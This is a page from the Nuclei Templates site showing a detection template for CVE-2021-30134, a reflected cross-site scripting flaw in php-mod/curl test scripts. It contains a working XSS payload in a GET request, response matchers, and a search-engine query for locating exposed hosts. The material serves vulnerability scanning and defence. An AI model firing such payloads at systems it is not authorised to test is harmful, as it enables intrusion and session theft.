Skip to content
Nuclei Templates

Php-mod/curl Library <2.3.2 - Cross-Site Scripting

ID: CVE-2021-30134

Severity: medium

Author: theamanrawat

Tags: cve2021,cve,xss,php-mod,wpscan,php_curl_class_project

Description

Section titled “Description”

Php-mod/curl library before 2.3.2 contains a cross-site scripting vulnerability via the post_file_path_upload.php key parameter and the POST data to post_multidimensional.php. An attacker can inject arbitrary script, which can allow theft of cookie-based authentication credentials and launch of other attacks.

YAML Source

Section titled “YAML Source”
id: CVE-2021-30134


info:
  name: Php-mod/curl Library <2.3.2 - Cross-Site Scripting
  author: theamanrawat
  severity: medium
  description: |
    Php-mod/curl library before 2.3.2 contains a cross-site scripting vulnerability via the post_file_path_upload.php key parameter and the POST data to post_multidimensional.php. An attacker can inject arbitrary script, which can allow theft of cookie-based authentication credentials and launch of other attacks.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement.
  remediation: |
    Upgrade to Php-mod/curl Library version 2.3.2 or later to mitigate the vulnerability.
  reference:
    - https://wpscan.com/vulnerability/0b547728-27d2-402e-ae17-90d539344ec7
    - https://nvd.nist.gov/vuln/detail/CVE-2021-30134
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-30134
    cwe-id: CWE-79
    epss-score: 0.00099
    epss-percentile: 0.41025
    cpe: cpe:2.3:a:php_curl_class_project:php_curl_class:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: php_curl_class_project
    product: php_curl_class
    google-query: inurl:"/php-curl-test/post_file_path_upload.php"
  tags: cve2021,cve,xss,php-mod,wpscan,php_curl_class_project


http:
  - method: GET
    path:
      - "{{BaseURL}}/vendor/curl/curl/tests/server/php-curl-test/post_file_path_upload.php?key=<img%20src%20onerror%3dalert(document.domain)>"


    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'key":"<img src onerror=alert(document.domain)>"'


      - type: word
        part: header
        words:
          - text/html


      - type: status
        status:
          - 200
# digest: 4b0a00483046022100a26337882a5e9eec245de19d5aa8bed12528870a203d92dbf6c145f983470d79022100fbcc74422e36ff6b2308984f79808f5c497fef383201c66f1f489d63d0b5253b:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-30134.yaml"

View on Github